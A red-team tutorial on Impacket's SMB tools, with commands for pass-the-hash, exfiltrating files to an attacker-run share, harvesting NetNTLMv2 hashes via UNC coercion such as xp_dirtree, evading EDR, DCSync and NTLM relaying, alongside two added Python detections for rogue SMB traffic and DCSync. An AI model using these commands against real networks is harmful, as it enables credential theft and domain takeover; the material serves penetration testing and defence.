For a red teamer, SMB (Server Message Block) is the lifeblood of the Windows network. It is the circulatory system of the enterprise: it’s how we move laterally, how we exfiltrate data, how we host our own payloads, and often, how we escalate privileges.

While the standard Samba smbclient (which we covered in our previous article) is a robust “Swiss Army Knife,” Impacket is the heavy artillery.

Impacket is a collection of Python classes that provides low-level programmatic access to network protocols. Created by SecureAuth (and now maintained by Fortra), it allows you to craft packets, manipulate flags, and interact with Windows services in ways that standard tools simply cannot.

In this deep dive, we will explore the “Holy Trinity” of Impacket’s SMB tools: smbclient.py, smbserver.py, and the legendary secretsdump.py. We will also touch on the dark art of NTLM Relaying with ntlmrelayx.py.

[!NOTE] This guide assumes you have Impacket installed. If not, I highly recommend using pipx to keep your environment clean: pipx install git+https://github.com/fortra/impacket.git


Part 1: The Power of smbclient.py

Native smbclient is great for file transfers, but it struggles with one key red team requirement: Pass-the-Hash (PtH).

Pass-the-Hash Support

If you have compromised a machine and dumped the SAM database or LSASS process, you rarely have the cracked plaintext password. You have the NTLM hash. Impacket was built for this.

# Syntax: -hashes LM:NT
# The LM part is almost always empty (or 32 zeros) in modern Windows.

# Format: user@target -hashes :NThash
smbclient.py -hashes :8846f7eaee8fb117ad06bdd830b7586c Administrator@10.10.10.5

This functionality alone makes smbclient.py indispensable. You can navigate the filesystem, download files, and upload payloads using nothing but the hash.

Scripted Interaction

smbclient.py behaves slightly differently from the native tool: it offers a semi-interactive shell with its own command set.

  • use <share>: Connect to a specific share.
  • shares: List available shares (requires permissions).
  • ls: List files.
  • get <remote> <local>: Download.
  • put <local> <remote>: Upload.
  • recurse TRUE: Toggle recursion for mget.

Why use smbclient.py over smbclient?

  1. Native PtH: No need for workarounds.
  2. Library Access: You can import impacket.smbconnection in your own Python scripts to build custom automated attack tools.
  3. Consistency: It behaves consistently across Linux, macOS, and Windows (via Python).

Part 2: Weaponizing smbserver.py

While smbclient.py allows you to consume shares, smbserver.py allows you to create them. This pseudo-SMB server is one of the most versatile tools in a Red Teamer’s kit.

Scenario 1: The “Easy Button” for Exfiltration

You are on a compromised Windows host via a reverse shell. You found passwords.xlsx but RDP copy-paste is disabled, and you can’t install tools on the victim.

  1. On Kali (Attacker):

    # Syntax: smbserver.py <ShareName> <Path>
    # -smb2support is critical for modern Windows (10/11/Server 2016+)
    sudo smbserver.py LOOT . -smb2support

  2. On Windows (Victim):

    copy C:\Users\CEO\Desktop\passwords.xlsx \\10.10.14.5\LOOT\


No firewall changes are needed (outbound SMB to the local subnet is usually allowed), and no valid credentials are needed on the Windows side (the share defaults to anonymous read/write).

Scenario 2: UNC Path Injection & Credential Harvesting

This is where smbserver.py becomes a weapon. If you can force a Windows machine (or user) to access a file path you control, Windows will automatically attempt to authenticate to you using the current user’s NetNTLMv2 hash.

  1. Start the Server:

    sudo smbserver.py AUTH . -smb2support

  2. Trigger the Connection:

    • Phishing: Send an email with a link to file://10.10.14.5/AUTH/bonus.docx.
    • Unquoted Service Path: If a service tries to run C:\Program Files\App.exe, you might intercept it.
    • SQL Injection: xp_dirtree '\\10.10.14.5\AUTH' on a database server.
    • Web Vulnerabilities: File inclusion or SSRF pointing to your IP.
  3. The Result: Impacket will capture the NetNTLMv2 hash of the connecting user. You can then crack this hash with Hashcat (-m 5600).

Scenario 3: EDR Evasion with Authenticated Shares

EDRs (Endpoint Detection & Response) often flag anonymous SMB connections to unknown IPs. You can harden your smbserver to look legitimate.

# Create a user/pass required to access the share
sudo smbserver.py -username backup -password 'S3cure!' BACKUP . -smb2support

Now, on the victim machine, you map the drive formally:

net use Z: \\10.10.14.5\BACKUP /user:backup S3cure!
copy sensitive.dat Z:\
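From the defender's side, Scenarios 2 and 3 share one observable: workstations and service accounts initiating SMB (TCP 445) connections to a host that is not a sanctioned file server, and in the harvesting case many different principals hitting the same unknown host. The following detection logic is an added example (not code from the page or from Impacket); it runs over constructed Sysmon Event ID 3 records, and the allowlist of approved SMB servers is an assumption for the sample environment.

```python
from collections import defaultdict

# Assumption (not from the page): the sanctioned SMB servers in this environment.
APPROVED_SMB_SERVERS = {"10.10.10.5", "10.10.10.10"}

# Constructed Sysmon Event ID 3 (NetworkConnect) records, reduced to the fields
# the detection needs. 10.10.14.5 is the attacker box from the scenarios above.
SAMPLE_EVENTS = [
    {"host": "WS01",  "user": "CORP\\ceo",   "image": "C:\\Windows\\System32\\cmd.exe",
     "dst": "10.10.14.5",  "dport": 445, "initiated": True},   # copy ... \\10.10.14.5\LOOT
    {"host": "WS01",  "user": "CORP\\ceo",   "image": "C:\\Windows\\explorer.exe",
     "dst": "10.10.10.10", "dport": 445, "initiated": True},   # normal file-server access
    {"host": "WS02",  "user": "CORP\\alice", "image": "C:\\Windows\\explorer.exe",
     "dst": "10.10.14.5",  "dport": 445, "initiated": True},   # followed a file:// link
    {"host": "SQL01", "user": "NT SERVICE\\MSSQLSERVER",
     "image": "C:\\Program Files\\Microsoft SQL Server\\MSSQL\\Binn\\sqlservr.exe",
     "dst": "10.10.14.5",  "dport": 445, "initiated": True},   # xp_dirtree coercion
    {"host": "WS03",  "user": "CORP\\bob",   "image": "System",
     "dst": "10.10.14.5",  "dport": 445, "initiated": False},  # inbound: not a client auth
]

def unknown_smb_destinations(events, approved):
    """Map each unapproved SMB destination to the set of (host, user) that initiated a connection."""
    fan_in = defaultdict(set)
    for ev in events:
        if ev["dport"] != 445 or not ev["initiated"] or ev["dst"] in approved:
            continue
        fan_in[ev["dst"]].add((ev["host"], ev["user"]))
    return dict(fan_in)

def is_service_principal(user):
    # Machine accounts end in '$'; Windows service SIDs are reported as NT SERVICE\...
    return user.endswith("$") or user.upper().startswith("NT SERVICE\\")

def classify(fan_in, min_clients=2):
    """One alert per rogue destination; severity rises when the harvesting pattern shows up."""
    alerts = []
    for dst, clients in sorted(fan_in.items()):
        notes = []
        if len(clients) >= min_clients:
            notes.append("multiple principals authenticating to one unknown share (harvesting pattern)")
        if any(is_service_principal(u) for _, u in clients):
            notes.append("service/machine account involved (possible coercion, e.g. xp_dirtree or SSRF)")
        severity = "high" if notes else "medium"
        alerts.append({"dst": dst, "clients": sorted(clients), "severity": severity, "notes": notes})
    return alerts
```

Because the logic keys on the destination rather than on anonymous access, the authenticated share from Scenario 3 is flagged just like the anonymous one.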

Part 3: The Crown Jewel - secretsdump.py

If smbclient.py is the hand, secretsdump.py is the fist. This tool automates the retrieval of secrets from a Windows machine using three primary techniques.

Technique 1: SAM and LSA Dump (Local Admin)

If you have Local Administrator credentials (plaintext or hash), secretsdump will:

  1. Connect to the ADMIN$ share.
  2. Upload a dummy service/binary.
  3. Execute it to dump the SAM (Security Account Manager) and SYSTEM registry hives.
  4. Parse them to give you local NTLM hashes.
  5. Clean up after itself.

# Dump local SAM hashes
secretsdump.py administrator@10.10.10.5 -hashes :NTHASH

Technique 2: DCSync (Domain Admin)

If you compromise a Domain Admin or a user with “Replicating Directory Changes” privileges, secretsdump performs a DCSync attack. It speaks MS-DRSR (Directory Replication Service Remote Protocol) to the Domain Controller and asks it to replicate user hashes.

Why this is dangerous: It generates no logon events on the endpoint targets. It looks like normal DC-to-DC replication traffic (mostly).

# Dump the ENTIRE Domain Database (NTDS.dit) remotely
secretsdump.py 'DOMAIN/Administrator:Password123@dc01.corp.local'

This will output:

  • NTLM hashes for every user in the domain.
  • Kerberos keys (AES128/256) for Golden Ticket creation.
  • Cleartext passwords (if reversible encryption is enabled).
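The "mostly" above is where detection lives: the replication request still produces a Security Event ID 4662 on the DC (given "Audit Directory Service Access" and a SACL on the domain object), and the subject is a user account rather than a DC computer account. The following is an added example (not from the page or from Impacket) that flags such events; the 4662 records are constructed, and the set of expected replicators is an assumption for the sample domain (any sanctioned sync account, e.g. a directory-sync service account, would belong in it too).

```python
import re

# Extended rights that authorise directory replication (well-known AD schema GUIDs).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
ADS_RIGHT_DS_CONTROL_ACCESS = 0x100
GUID_RE = re.compile(r"\{([0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12})\}", re.I)

# Assumption: principals whose replication is expected (DC computer accounts, sanctioned sync accounts).
EXPECTED_REPLICATORS = {"DC02$"}

# Constructed Security Event ID 4662 records; Properties keeps the event's multi-line layout.
REPL_PROPS = ("Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
              "\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}")
SAMPLE_4662 = [
    {"SubjectUserName": "DC02$", "AccessMask": "0x100", "Properties": REPL_PROPS},          # DC-to-DC
    {"SubjectUserName": "Administrator", "AccessMask": "0x100", "Properties": REPL_PROPS},  # the DCSync above
    {"SubjectUserName": "alice", "AccessMask": "0x10",                                      # ordinary read
     "Properties": "Read Property\n\t{bf967aba-0de6-11d0-a285-00aa003049e2}"},
]

def replication_rights(properties):
    """Return the names of replication rights referenced in a 4662 Properties field."""
    return sorted(REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(properties)
                  if g.lower() in REPLICATION_RIGHTS)

def dcsync_alerts(events, expected):
    """Flag Control Access on replication rights by any principal that is not an expected replicator."""
    expected_upper = {a.upper() for a in expected}
    alerts = []
    for ev in events:
        if int(ev["AccessMask"], 16) & ADS_RIGHT_DS_CONTROL_ACCESS == 0:
            continue
        rights = replication_rights(ev["Properties"])
        if not rights or ev["SubjectUserName"].upper() in expected_upper:
            continue
        alerts.append((ev["SubjectUserName"], rights))
    return alerts
```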

Technique 3: NTDS.dit via VSS

If you cannot DCSync but have admin access to a DC, secretsdump can use Volume Shadow Copies (VSS) to copy the locked NTDS.dit database file and parse it offline.

secretsdump.py -use-vss Administrator@dc01.corp.local

Part 4: The Weapon of Mass Destruction - ntlmrelayx.py

Relaying is conceptually simple: User A tries to authenticate to you. You forward that authentication to Server B. Server B thinks you are User A and lets you in.

The Constraint: SMB Signing

You cannot relay SMB authentication to another SMB server if SMB Signing is enabled (and it is enforced on Domain Controllers).

The Bypass: Cross-Protocol Relaying

The magic of ntlmrelayx.py is that you catch an SMB authentication (e.g., from Responder or smbserver) and relay it to Non-SMB protocols that often don’t enforce signing, like LDAP, IMAP, or HTTP (AD CS).

# SOCKS Proxy Mode (-socks)
# This creates a SOCKS proxy for every successful relayed session.
ntlmrelayx.py -tf targets.txt -smb2support -socks

  1. Victim connects to you.
  2. ntlmrelayx relays to targets.txt.
  3. If successful, it opens a SOCKS connection on port 1080.
  4. You leverage it with proxychains:

    proxychains smbclient //10.10.10.50/C$ -U Admin


Part 5: Comparing Architectures

Feature       | smbclient (Native)       | smbclient.py (Impacket)
--------------|--------------------------|------------------------------------------------------------------
Language      | C (Samba)                | Python
Pass-the-Hash | No (requires workaround) | Yes (native)
Kerberos      | Yes (via -k)             | Yes (via -k and -target)
Speed         | Fast                     | Slower (Python overhead)
Scripting     | Bash/Expect              | Importable Python module
Forensics     | Looks like “Samba”       | User-Agent defaults to Python/Impacket string (changeable in code)

Part 6: Troubleshooting Impacket

  1. Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

    • Cause: Your attacker machine time is out of sync with the Domain Controller. Kerberos requires sync within 5 minutes.
    • Fix: sudo ntpdate dc01.corp.local or rdate -n <IP>.
  2. STATUS_SHARING_VIOLATION

    • Cause: You are trying to download a file that is currently locked/open by a user (e.g., a loaded NTUSER.DAT).
    • Fix: Use secretsdump.py with -use-vss to create a shadow copy snapshot, bypassing the file lock.
  3. STATUS_MORE_PROCESSING_REQUIRED

    • Cause: Often seen during NTLM negotiation. If it hangs, a mechanism such as “Extended Protection for Authentication” (EPA) may be blocking the relay, or it may simply be a protocol negotiation mismatch.

Conclusion

Impacket is not just a tool; it is a framework that fundamentally changed how we attack Windows networks. While smbclient.py gives you access, tools like secretsdump.py and ntlmrelayx.py give you dominion.

Understand the underlying protocols. Don’t just run the script; know why secretsdump works (DRSUAPI vs SCM capabilities). Know why relaying fails (Signing). That knowledge separates the script kiddie from the professional operator.

Harden your ops, check your logs, and as always:

Happy Hacking.
